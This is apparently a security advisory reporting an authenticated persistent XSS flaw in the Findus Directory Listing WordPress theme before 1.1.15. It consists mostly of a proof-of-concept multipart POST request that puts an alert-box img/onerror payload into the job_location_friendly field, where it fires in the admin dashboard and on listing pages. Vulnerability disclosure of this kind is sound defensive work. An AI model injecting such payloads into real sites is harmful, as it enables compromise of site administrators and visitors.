Findus – Directory Listing < 1.1.15 – Authenticated Persistent XSS

Description

Authenticated Persistent XSS vulnerability was discovered in the «Findus - Directory Listing WordPress Theme», tested version — v1.1.14.

Proof of Concept

Injected payload will trigger in the admin dashboard, in the «My listings» page and on listing page itself.

POST /submit-listing/ HTTP/1.1
Host: example.com
Referer: https://example.com/submit-listing/
Content-Type: multipart/form-data; boundary=---------------------------231039310519520224624122488079
Content-Length: 6402
Origin: https://www.demoapus-wp1.com
Cookie: chosen_listing_package=283;[ other_cookies_here ]

-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="_wpjm_nonce"

089745f948
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="_wp_http_referer"

/submit-listing/
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_tagline"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_category[]"

39
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_description"

PoC
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_logo"; filename=""
Content-Type: application/octet-stream


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_cover_image"; filename=""
Content-Type: application/octet-stream


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_gallery_images[]"; filename=""
Content-Type: application/octet-stream


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_video"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_regions[]"

usa
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_regions[]"

new-york
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_location_friendly"

"><img src=x onerror=alert(`XSS`)>
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_location"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="geo_latitude"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="geo_longitude"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_phone"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_email"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_website"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[timezone]"

UTC
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][1][from][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][1][to][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][1][type]"

enter_hours
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][2][from][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][2][to][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][2][type]"

enter_hours
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][3][from][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][3][to][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][3][type]"

enter_hours
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][4][from][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][4][to][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][4][type]"

enter_hours
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][5][from][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][5][to][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][5][type]"

enter_hours
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][6][from][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][6][to][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][6][type]"

enter_hours
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][0][from][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][0][to][]"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_hours[day][0][type]"

enter_hours
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_price_from"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_price_to"


-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_price_range"

notsay
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_manager_form"

submit-job
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="job_id"

0
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="step"

1
-----------------------------231039310519520224624122488079
Content-Disposition: form-data; name="submit_job"

Save & Preview
-----------------------------231039310519520224624122488079--